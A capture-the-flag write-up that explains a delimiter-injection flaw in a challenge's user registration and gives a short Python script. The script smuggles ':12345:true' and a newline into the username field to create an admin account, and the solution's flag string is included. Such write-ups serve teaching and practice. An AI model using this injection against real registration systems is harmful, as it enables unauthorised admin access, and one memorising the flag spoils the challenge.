In this challenge you should register a new user as admin. Both inputs aren't sanitized for the colon char, which is also used for serializing the ACL:

```
def _pack_data(data_dict):
"""
Pack data with data_structure.
"""
return '{}:{}:{}'.format(
data_dict['username'],
data_dict['password'],
data_dict['admin']
)
```

Simple exploit in python (user=fearless with pass=12345):

```
import requests

data = {
'username': 'fearless:12345:true\ntest',
'password': 'test'
}
r = requests.post('http://35.198.113.131:7060/register', data = data)
print r.text
```

Then you can simply login at the main (index) page.

Note: This challenge contains a bug - after adding a new user, the server must be restarted to read new registered users...

The flag:
```
evlz{T#3_W34K_$N4K3}ctf
```